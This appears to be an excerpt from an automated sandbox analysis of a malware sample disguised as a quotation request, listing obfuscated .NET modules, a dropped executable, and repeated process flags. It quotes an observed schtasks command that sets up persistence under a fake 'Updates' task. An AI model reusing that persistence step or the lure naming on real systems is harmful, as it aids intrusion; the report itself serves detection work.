Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs	.Net Code: KZPpdhKyfa System.Reflection.Assembly.Load(byte[])
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs	.Net Code: KZPpdhKyfa System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 0_2_06C576A0 push eax; ret	0_2_06C576A1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 9_2_01259C30 push esp; retf 0127h	9_2_01259D55
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 11_2_069A76A0 push eax; ret	11_2_069A76A1
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 14_2_06DB9241 push es; ret	14_2_06DB9244

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Static PE information: section name: .text entropy: 7.944191004977694
Source: jnqeRRexnD.exe.0.dr	Static PE information: section name: .text entropy: 7.944191004977694

Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, UPSlk94tjStGG9oASY.cs	High entropy of concatenated method names: 'Dispose', 'nyOXmtcycm', 'ncjM0COuFn', 'Ryd8rdIDSY', 'kojXPJXRsR', 'mlyXzPY0g0', 'ProcessDialogKey', 'NAUM30fXPu', 'KnhMXNt55Q', 'Yq6MMjVsg1'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, ovvxIOBcgJSvJUVhrj.cs	High entropy of concatenated method names: 'UH7xGeYKRv', 'suMxOi4bLu', 'YkCJwDuCBx', 'CIJJ2IicfO', 'tJgJWSqQCm', 'RNUJuqHyFB', 'Fl8Ji8tEFl', 'XojJap65Xy', 'HNqJn2uMoK', 'BFKJqSt3uP'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, jQhdguv7LgIcxDIctV.cs	High entropy of concatenated method names: 'tdXJbLmLJN', 'wtNJ5F2XGJ', 'a2uJTN1BTh', 'DelJvJkeZN', 'BkXJsNb30U', 'QLAJoPZjR4', 'gQEJCYbJJD', 'H3BJS9WEgX', 'fliJKSg9CD', 'TclJI2gNkS'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, JqK2bvTxFx9IG6SpuA.cs	High entropy of concatenated method names: 'Gt14hMpllf', 'zEW4cObXUC', 'frf4fy9iIb', 'QfD4QhBXjv', 'eL947eBR1L', 'ikO48VVO4t', 'X2P4A0lkna', 'YPH41ZhEfg', 'pnn4mUpZKZ', 'COV4PFcTKR'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs	High entropy of concatenated method names: 'QDtjr11tKm', 'UUrjU49qJd', 'g7tj4QHM48', 'awZjJRiMIZ', 'awajxJRu42', 'e4ljR4731R', 'uuuj6HIdGg', 'TC5jtyvNw6', 'si2jgVKoBS', 'yqWjeUgbbc'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, X7d5Q5p1LvpfLmNfVx.cs	High entropy of concatenated method names: 'SLWX6qK2bv', 'iFxXt9IG6S', 'K7LXegIcxD', 'sctXVVsvvx', 'fVhXsrj2i9', 'bnwXoaay1W', 'ayVhTvcLwYx7MGWuJp', 'ThHsqpwi38yuvFC4sl', 'PoHXXOnfRJ', 'TsbXjVn1ma'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, Ii9Xnwkaay1WuTYMGQ.cs	High entropy of concatenated method names: 'snVRr27LLB', 'XwRR4ewhUs', 'kA3RxXBmxc', 't40R6X24ul', 'EaaRt3DteG', 'oQ6x7fcZCj', 'zB0x8SrmNF', 'SsExAE6Xin', 'xJrx1hETfn', 'f3OxmXt73i'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, x5ws4ZMjtJeIYwNfXm.cs	High entropy of concatenated method names: 'InjdTZvVf', 'TXybLluH1', 'ndV52bYIZ', 'x7jOYmCiP', 'VQ2vYiAn0', 'ceGBiBmbJ', 'GlcFJwivkdVF41xoQp', 'u387ZwKPkEI0hKBwYC', 'g6wSbqWwt', 'GyvIAILEQ'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, aeNkwmhsZGOkwOyTql.cs	High entropy of concatenated method names: 'Y4wsq8jvKA', 'ibVs9aalCb', 'wvrshDHEUc', 'MaCscPEI4x', 'Fmss0yjfX8', 'ofDswdCPm4', 'Pfcs29bdTt', 'U65sWpubWw', 'xrlsuopxKW', 'PxlsibRCm9'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, sCMxesXXjqAegoG9j6G.cs	High entropy of concatenated method names: 'mtuIPLpvlZ', 'T8nIzuAGue', 'BHtF3Wh9YW', 'wQYFXZURKH', 'WE8FMWJLpN', 'jf1FjEEDJQ', 'zRHFpCOKeS', 'TadFrornBY', 'NkkFUprOXH', 'oxnF4LKOcv'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, iMBWkb0as7CGSU5mdc.cs	High entropy of concatenated method names: 'rlBdmTof08XIpNNmvA9', 'x4KGnhoIo3aZn0c9ad7', 'hVy7H0oWykCxGEwBAIJ', 'j3lRSPQYmu', 'facRK23vv3', 'EUQRIxnoeQ', 'VCKlbXoVlIftl0hiTXd', 'ejl0LRoMKPmStRhdDJ1'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, H9Z5mTAKXZyOtcycmt.cs	High entropy of concatenated method names: 'X5fKsBoBh6', 'rIkKCqkXGW', 'TVnKK6pMcH', 'NwWKF1leWs', 'rPXKLBudfn', 'U69KYaEJJc', 'Dispose', 'LBQSUywCSo', 'bpgS4sZPQg', 'VB3SJm4Qt8'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, cVsg14PySj56ttQ831.cs	High entropy of concatenated method names: 'pjhIJPIkDB', 'zQWIxckejE', 'ugaIRvXOZv', 'hvVI6Nwpym', 'MLfIK47VvQ', 'aWnItIlQE9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, QqELW6HxRqDoYT0tcl.cs	High entropy of concatenated method names: 'hwvZTpUQt7', 'cQ0ZvkafiP', 'P2RZkTPB3R', 'NOQZ06L8Pg', 'LwcZ2RAPSU', 'M32ZWS5KD1', 'EMeZiCpRUn', 'Wj8ZanqSKC', 'pRNZqnEZha', 'mtUZyfyOkB'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, POlyOhfijgKRcdlA2f.cs	High entropy of concatenated method names: 'ToString', 'SNdoyAetvR', 'Rmko0DEDVf', 'jDcowRn8SW', 'Hxno2IXLt5', 'mPXoWp6a0u', 'jlwouOvq6G', 'CttoiH38D0', 'FLLoahOYV8', 'zuNonmnCR6'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, ERskp5zfMQtJPNdwj4.cs	High entropy of concatenated method names: 'nerI5XJyJi', 'DivIT4CmsE', 'R9uIv4NIgh', 'd5RIk3cCZy', 'vLZI0WsSCI', 'LqSI2rDvcO', 'mbBIWX2rGX', 'X51IYgwjce', 'g81IlFMDo7', 'vulIExB0Z0'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, hJrajR89jKhw22GlAw.cs	High entropy of concatenated method names: 'cdqC1Eusu8', 'L10CPWuwOp', 'LA9S3HM9jX', 'VjiSXipYYj', 'BphCylAee5', 'HWsC9g5Zpg', 'Os4CHbRi3C', 'MYsChrMtN0', 'DwXCc7XpC7', 'CXDCfZe93N'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, v1YFv8XpsPxjF1eUO8l.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LsHDK40kxL', 'sSoDIWcED7', 'Jm0DFI8snB', 'GPmDDHhSU1', 'lJvDLfi3df', 'UIoDN8r4xo', 'ThmDYpc4Kh'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, f0fXPuminhNt55QPq6.cs	High entropy of concatenated method names: 'in1Kk02VQW', 'xyEK0Yi134', 'eZZKw0VydV', 'E9RK2ZZRyJ', 'sNcKW880HP', 'rQRKutqe8l', 'T5OKi9Nmtw', 'sbBKaL7eU0', 'BlYKnnVGre', 'uZWKqGmvye'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, knUupbQZqxsA2ZB6Nx.cs	High entropy of concatenated method names: 'trYCetiBJr', 'oZSCV54kgX', 'ToString', 'DSSCUO5J8g', 'qogC4CPpuO', 'OjZCJ1Bjyr', 'EnkCxYnGqk', 'hIiCRgWvQR', 'OKiC63crjl', 'sYrCtlUwoN'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, RjDupPnYBMvHAAEH05.cs	High entropy of concatenated method names: 'EMK6lORSei', 'UQ16EU8pn3', 'iIq6dCl0sx', 'JMp6b0hOq2', 'zfw6Gc4XZe', 'CCy65Rgc6r', 'gQU6OXUZNR', 'TTX6T6NNaq', 'jXk6vgabsW', 'aAR6BobCCx'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, o9P0T5X38MD9r6NPGD7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd2dIyITnWQ', 'NDRI9rOv4L', 'zxHIHKvtqE', 'YdZIhRxkFp', 'jjeIc7nYYR', 'tTyIfEtWGD', 'kNqIQEIvBE'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, UPSlk94tjStGG9oASY.cs	High entropy of concatenated method names: 'Dispose', 'nyOXmtcycm', 'ncjM0COuFn', 'Ryd8rdIDSY', 'kojXPJXRsR', 'mlyXzPY0g0', 'ProcessDialogKey', 'NAUM30fXPu', 'KnhMXNt55Q', 'Yq6MMjVsg1'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, ovvxIOBcgJSvJUVhrj.cs	High entropy of concatenated method names: 'UH7xGeYKRv', 'suMxOi4bLu', 'YkCJwDuCBx', 'CIJJ2IicfO', 'tJgJWSqQCm', 'RNUJuqHyFB', 'Fl8Ji8tEFl', 'XojJap65Xy', 'HNqJn2uMoK', 'BFKJqSt3uP'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, jQhdguv7LgIcxDIctV.cs	High entropy of concatenated method names: 'tdXJbLmLJN', 'wtNJ5F2XGJ', 'a2uJTN1BTh', 'DelJvJkeZN', 'BkXJsNb30U', 'QLAJoPZjR4', 'gQEJCYbJJD', 'H3BJS9WEgX', 'fliJKSg9CD', 'TclJI2gNkS'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, JqK2bvTxFx9IG6SpuA.cs	High entropy of concatenated method names: 'Gt14hMpllf', 'zEW4cObXUC', 'frf4fy9iIb', 'QfD4QhBXjv', 'eL947eBR1L', 'ikO48VVO4t', 'X2P4A0lkna', 'YPH41ZhEfg', 'pnn4mUpZKZ', 'COV4PFcTKR'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs	High entropy of concatenated method names: 'QDtjr11tKm', 'UUrjU49qJd', 'g7tj4QHM48', 'awZjJRiMIZ', 'awajxJRu42', 'e4ljR4731R', 'uuuj6HIdGg', 'TC5jtyvNw6', 'si2jgVKoBS', 'yqWjeUgbbc'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, X7d5Q5p1LvpfLmNfVx.cs	High entropy of concatenated method names: 'SLWX6qK2bv', 'iFxXt9IG6S', 'K7LXegIcxD', 'sctXVVsvvx', 'fVhXsrj2i9', 'bnwXoaay1W', 'ayVhTvcLwYx7MGWuJp', 'ThHsqpwi38yuvFC4sl', 'PoHXXOnfRJ', 'TsbXjVn1ma'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, Ii9Xnwkaay1WuTYMGQ.cs	High entropy of concatenated method names: 'snVRr27LLB', 'XwRR4ewhUs', 'kA3RxXBmxc', 't40R6X24ul', 'EaaRt3DteG', 'oQ6x7fcZCj', 'zB0x8SrmNF', 'SsExAE6Xin', 'xJrx1hETfn', 'f3OxmXt73i'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, x5ws4ZMjtJeIYwNfXm.cs	High entropy of concatenated method names: 'InjdTZvVf', 'TXybLluH1', 'ndV52bYIZ', 'x7jOYmCiP', 'VQ2vYiAn0', 'ceGBiBmbJ', 'GlcFJwivkdVF41xoQp', 'u387ZwKPkEI0hKBwYC', 'g6wSbqWwt', 'GyvIAILEQ'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, aeNkwmhsZGOkwOyTql.cs	High entropy of concatenated method names: 'Y4wsq8jvKA', 'ibVs9aalCb', 'wvrshDHEUc', 'MaCscPEI4x', 'Fmss0yjfX8', 'ofDswdCPm4', 'Pfcs29bdTt', 'U65sWpubWw', 'xrlsuopxKW', 'PxlsibRCm9'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, sCMxesXXjqAegoG9j6G.cs	High entropy of concatenated method names: 'mtuIPLpvlZ', 'T8nIzuAGue', 'BHtF3Wh9YW', 'wQYFXZURKH', 'WE8FMWJLpN', 'jf1FjEEDJQ', 'zRHFpCOKeS', 'TadFrornBY', 'NkkFUprOXH', 'oxnF4LKOcv'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, iMBWkb0as7CGSU5mdc.cs	High entropy of concatenated method names: 'rlBdmTof08XIpNNmvA9', 'x4KGnhoIo3aZn0c9ad7', 'hVy7H0oWykCxGEwBAIJ', 'j3lRSPQYmu', 'facRK23vv3', 'EUQRIxnoeQ', 'VCKlbXoVlIftl0hiTXd', 'ejl0LRoMKPmStRhdDJ1'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, H9Z5mTAKXZyOtcycmt.cs	High entropy of concatenated method names: 'X5fKsBoBh6', 'rIkKCqkXGW', 'TVnKK6pMcH', 'NwWKF1leWs', 'rPXKLBudfn', 'U69KYaEJJc', 'Dispose', 'LBQSUywCSo', 'bpgS4sZPQg', 'VB3SJm4Qt8'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, cVsg14PySj56ttQ831.cs	High entropy of concatenated method names: 'pjhIJPIkDB', 'zQWIxckejE', 'ugaIRvXOZv', 'hvVI6Nwpym', 'MLfIK47VvQ', 'aWnItIlQE9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, QqELW6HxRqDoYT0tcl.cs	High entropy of concatenated method names: 'hwvZTpUQt7', 'cQ0ZvkafiP', 'P2RZkTPB3R', 'NOQZ06L8Pg', 'LwcZ2RAPSU', 'M32ZWS5KD1', 'EMeZiCpRUn', 'Wj8ZanqSKC', 'pRNZqnEZha', 'mtUZyfyOkB'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, POlyOhfijgKRcdlA2f.cs	High entropy of concatenated method names: 'ToString', 'SNdoyAetvR', 'Rmko0DEDVf', 'jDcowRn8SW', 'Hxno2IXLt5', 'mPXoWp6a0u', 'jlwouOvq6G', 'CttoiH38D0', 'FLLoahOYV8', 'zuNonmnCR6'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, ERskp5zfMQtJPNdwj4.cs	High entropy of concatenated method names: 'nerI5XJyJi', 'DivIT4CmsE', 'R9uIv4NIgh', 'd5RIk3cCZy', 'vLZI0WsSCI', 'LqSI2rDvcO', 'mbBIWX2rGX', 'X51IYgwjce', 'g81IlFMDo7', 'vulIExB0Z0'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, hJrajR89jKhw22GlAw.cs	High entropy of concatenated method names: 'cdqC1Eusu8', 'L10CPWuwOp', 'LA9S3HM9jX', 'VjiSXipYYj', 'BphCylAee5', 'HWsC9g5Zpg', 'Os4CHbRi3C', 'MYsChrMtN0', 'DwXCc7XpC7', 'CXDCfZe93N'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, v1YFv8XpsPxjF1eUO8l.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LsHDK40kxL', 'sSoDIWcED7', 'Jm0DFI8snB', 'GPmDDHhSU1', 'lJvDLfi3df', 'UIoDN8r4xo', 'ThmDYpc4Kh'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, f0fXPuminhNt55QPq6.cs	High entropy of concatenated method names: 'in1Kk02VQW', 'xyEK0Yi134', 'eZZKw0VydV', 'E9RK2ZZRyJ', 'sNcKW880HP', 'rQRKutqe8l', 'T5OKi9Nmtw', 'sbBKaL7eU0', 'BlYKnnVGre', 'uZWKqGmvye'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, knUupbQZqxsA2ZB6Nx.cs	High entropy of concatenated method names: 'trYCetiBJr', 'oZSCV54kgX', 'ToString', 'DSSCUO5J8g', 'qogC4CPpuO', 'OjZCJ1Bjyr', 'EnkCxYnGqk', 'hIiCRgWvQR', 'OKiC63crjl', 'sYrCtlUwoN'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, RjDupPnYBMvHAAEH05.cs	High entropy of concatenated method names: 'EMK6lORSei', 'UQ16EU8pn3', 'iIq6dCl0sx', 'JMp6b0hOq2', 'zfw6Gc4XZe', 'CCy65Rgc6r', 'gQU6OXUZNR', 'TTX6T6NNaq', 'jXk6vgabsW', 'aAR6BobCCx'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, o9P0T5X38MD9r6NPGD7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd2dIyITnWQ', 'NDRI9rOv4L', 'zxHIHKvtqE', 'YdZIhRxkFp', 'jjeIc7nYYR', 'tTyIfEtWGD', 'kNqIQEIvBE'

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

File created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
